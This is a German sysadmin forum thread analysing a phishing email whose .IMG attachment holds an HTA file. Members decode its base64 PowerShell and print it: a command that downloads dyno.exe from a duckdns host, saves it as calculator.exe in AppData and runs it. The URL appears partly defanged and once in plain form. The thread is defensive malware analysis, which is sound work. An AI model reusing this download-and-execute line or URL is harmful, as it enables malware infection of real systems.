Phishing Mail mit schädlichen Images in freier Wildbahn (.IMG Datei)

Mitglied: wolfble
Moin Moin an alle

Gestern bekam ich eine EMail mit irgendwelchen komischen Sepa Einzugsankündigungen die man angeblich der angehängten Datei entnehmen kann. Ging so
um 4k .. Autoteile ... ja ne ist klar als Verwaltung käuft man ja immer Autoteile im mittleren vierstelligen Bereich (wenn man nicht grade aus der Branche kommt).

Als Dateianhang war eine .IMG dran (Das hatte ich auch noch nicht, es halt ein Datenträgerimageformat wie .ISO). Größe so 1 MB ..

Das meiste war leer (Ich denke man wollte das nur künstlich aufbladen weil viele Scanner nur bis zu einer gewissen Größe scannen)

In der IMG war eine .HTA Datei mit folgendem Inhalt


Ok, man kann sich denken was hier versucht wird .. nachdem .ZIP und .RAR wohl kaum noch durchkommt nehmen wir halt was anderes zb. IMG. und hoffen das die .hta irgendwer dann anklickt. Und das läd dann über ein Powershell script Unfug nach.

Interessant wäre es ob man das wieder lesebar machen kann, dann wüsste man was genau von wo nachgeladen wird.

Content-Key: 1078421591

Url: https://administrator.de/contentid/1078421591

Ausgedruckt am: 21.09.2021 um 02:09 Uhr

Mitglied: Lochkartenstanzer
Lochkartenstanzer 23.07.2021 aktualisiert um 11:09:43 Uhr
Goto Top
Moin,

Da steht nur bas64-codiert drin:
invoke-webrEquEST -URi http://linkdXXX.duckdnsXXX.orgXXX/XXX11d/XXXdyno.exe -ouTfilE $ENV:ApPDATA\calculator.exe ; iNVoke-ExPREsSioN $env:AppDAta\calculator.exe

Der holt sich also eine dyno.exe udn speichert sie in Appdata als calculator.exe ab und ruft diese auf. Und damit das nciht auffällt, wird Powershell mit bypass udn noprofile aufgerufen.

lks

PS: Die X-e sind von mir, damit da nicht ein Depp einfach draufklickt.

PPS: Kann sein, daß beim Editieren der base64-Ausgabe (base64 -d) ich Zeichen verschluckt habe, aber das dürfte für das verständnis egal sein, was das Ding macht.

P3S: Das gehört zum kleinen Einmaleins des sicherheitsbewußten Admin, sowas selbst herauszufinden. :-) face-smile

P4S: Sowas landet im Fliegenfänger bei mir mehrmals täglich.

P5S:decode base64

Edit: beim editieren Ausgabe war der Parameter von invoke-expression veschwunden.
Mitglied: Fennek11
Fennek11 23.07.2021 aktualisiert um 10:06:31 Uhr
Goto Top
Es ist Base64:

$DecodedText = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($b64))
$DecodedText

und ergibt nach Entfernen einiger Tabs:

invoke-webrEquEST -URi ”http[:]//linkd.duckdns[.]org/11d/dyno.exe” -ouTfilE ”$ENV:ApPDATA\calculator.exe”

Fehlt da noch etwas?
Mitglied: Lochkartenstanzer
Lochkartenstanzer 23.07.2021 aktualisiert um 10:35:38 Uhr
Goto Top
Zitat von @Fennek11:

Es ist Base64:

invoke-webrEquEST -URi ”http://linkd.duckdns.org/11d/dyno.exe&rdquo" -ouTfilE ”$ENV:ApPDATA\calculator.exe”

Fehlt da noch etwas?

invoke-expression $env:AppDAta\calculator.exe :-) face-smile

lks

Edit: parameter von invoke-Expression ergänzt.
Mitglied: wolfble
wolfble 23.07.2021 um 10:14:12 Uhr
Goto Top
Mit was hast du das denn decodiert .. Das es Base64 ist habe ich gesehen das ist ja ziemlich charakteristisch, aber ich hab nur kauderwelsch rausbekommen ... Ansonsten ist das so wie ich dachte ...
Mitglied: Lochkartenstanzer
Lochkartenstanzer 23.07.2021 um 10:16:57 Uhr
Goto Top
Zitat von @wolfble:

Mit was hast du das denn decodiert .. Das es Base64 ist habe ich gesehen das ist ja ziemlich charakteristisch, aber ich hab nur kauderwelsch rausbekommen ... Ansonsten ist das so wie ich dachte ...

Mit dem Tool base64 das so ziemlich mit jeder Distribution dabei ist und auch unter Linux mit WSL oder cygwin zur verfügung steht.

Mit den online-Tools aus der google-Suche oben geht das natürlich auch. Man muß nur die Sonderzeichen geschickt interpretieren, die da zwischendrin stehen. :-) face-smile

lks
Mitglied: aqui
aqui 23.07.2021 um 10:21:09 Uhr
Goto Top
Mitglied: wolfble
wolfble 23.07.2021 um 10:26:39 Uhr
Goto Top
Ah ich sehs in meinem alter sieht man nicht mehr so gut ;-) face-wink .. die IP geht irgendwo zu ner Strato seite die werden sie dafür missbraucht haben und wenn das bemerkt wird wandern sie zu nächsten ist mit duckdns ja ken Problem .

Also wie immer .oO
Mitglied: Lochkartenstanzer
Lochkartenstanzer 23.07.2021 aktualisiert um 10:45:27 Uhr
Goto Top
Übrigens:

Bei Virustotal sind momentan nur 5 Scanner der Meinung, daß es Malware ist, wenn man die URL angibt. Wenn man die datei selbst hochlädt, sind es bei virustotal 10 Scanner, die Malware erkennen.


TGIF

lks

PS. Man sieht aktuell alle paar Minuten, wie immer mehr Scanner die Dateie als Malware detektieren.
Mitglied: aqui
aqui 23.07.2021 aktualisiert um 12:24:41 Uhr
Goto Top
Auf'm Mac darf er gerne mal Powershell versuchen... 🤣
Mitglied: Delta9
Delta9 23.07.2021 um 12:28:36 Uhr
Goto Top
Zitat von @aqui:

Auf'm Mac darf er gerne mal Powershell versuchen... 🤣

Es gibt doch Powershell auf dem MAC :-) face-smile
Mitglied: Lochkartenstanzer
Lochkartenstanzer 23.07.2021 aktualisiert um 12:32:50 Uhr
Goto Top
Zitat von @aqui:

Auf'm Mac darf er gerne mal Powershell versuchen... 🤣

Installieren von PowerShell unter macOS

lks

PS: Für pöhses unter MacOS reicht auch die bash (oder zsh).
Mitglied: aqui
aqui 23.07.2021 um 15:41:06 Uhr
Goto Top
zsh ist schöner ! ;-) face-wink
Mitglied: aqui
aqui 25.07.2021 aktualisiert um 12:58:10 Uhr
Goto Top
@wolfble
Wenn's das denn nun war bitte nicht vergessen den Thread dann auch zu schliessen !
https://administrator.de/faq/32
Mitglied: wolfble
wolfble 25.07.2021 um 15:51:40 Uhr
Goto Top
Wo ist das denn versteckt?
Mitglied: Ex0r2k16
Ex0r2k16 29.07.2021 um 15:00:31 Uhr
Goto Top
ich habe die Dinger schon vor nem Jahr in der Quarantäne gehabt. Mittlerweile habe ich .img verboten. Feddisch
Mitglied: aqui
aqui 29.07.2021 um 19:07:49 Uhr
Goto Top
Zeit auch den Thread dann langsam mal zu schliessen !
https://administrator.de/faq/32
Mitglied: wolfble
wolfble 31.07.2021 um 15:11:04 Uhr
Goto Top
Villeicht bin ich blind aber ich seh hier nichts um das zu tun 🤔
Heiß diskutierte Beiträge
question
Windows PrintServer 2016 - KB5005573 macht Drucken unmöglich Fehler 0x11bbeidermachtvongreyscullVor 1 TagFrageWindows Server22 Kommentare

Moin Kollegen, verdammt den hatte ich nicht auf dem Schirm. Ich hab gestern Sicherheitsupdates auf unseren 2016ern ausgerollt und heute morgen kann keiner mehr drucken, ...

question
Rechner im Netzwerk frieren nach Neustart einCZF-MarkusVor 1 TagFrageWindows Netzwerk15 Kommentare

Seit einer Woche frieren unsere Rechner (Windows 10) im Firmennetzwerk nach einem Neustart ein, mal ist es die Outlook.exe, mal die Explorer.exe, mal die .exe ...

question
Macadresse fest auf dem Board ändernDippsVor 1 TagFrageHardware12 Kommentare

Hallo ich habe ein Mainboard was defekt ist. Nun habe ich das Typgleiche geholt und ausgetauscht. Es läuft ein Linux drauf mit einer Software die ...

question
Kauftipp für einfaches KabelmodemTheEPOCHVor 1 TagFrageHardware5 Kommentare

Hallo zusammen, ich bräuchte eine kleine Kaufberatung. Ich suche ein ganz einfaches Kabelmodem. Das Gerät soll vor eine OPNsense und das Internet bereitstellen. DOCSIS 3.0 ...

question
Clonen einer SSD Platte auf eine grösserejensgebkenVor 22 StundenFrageFestplatten, SSD, Raid9 Kommentare

Hallo Gemeinschaft habe in meinem Rechner eine alte SSD 128 und eine neu installierte mit Windows 10 drauf 512 GB nun möchte ich gerne die ...

question
Aufbau Netzstruktur für CARP mit OPNsense gelöst screemyVor 1 TagFrageLinux Netzwerk6 Kommentare

Guten Abend, wir betreiben auf 2 ProxmoxVE Hosts jeweils eine OPNsense. Diese möchten wir mittels CARP hochverfügbar konfigurieren für die LAN/WAN Schnittstelle. Folgender Aufbau ist ...

info
Druckprobleme an PrintServern nach Sept. 2021 UpdatekgbornVor 1 TagInformationWindows Server

FYI: Seit die Sicherheitsupdates vom Patchday 14. September 2021 ausgerollt wurden, stehen Administratoren vor dem Problem, dass Clients eventuell nicht mehr an einem Terminalsever oder ...

question
Fritzbox als VPNClientproton34Vor 1 TagFrageRouter & Routing7 Kommentare

Hallo, ich habe dem letzt gelesen, dass es nicht möglich sein soll eine FritzBox 7490 als VPNClient zu verwenden. Den Beitrag findet ihr hier:. Jetzt ...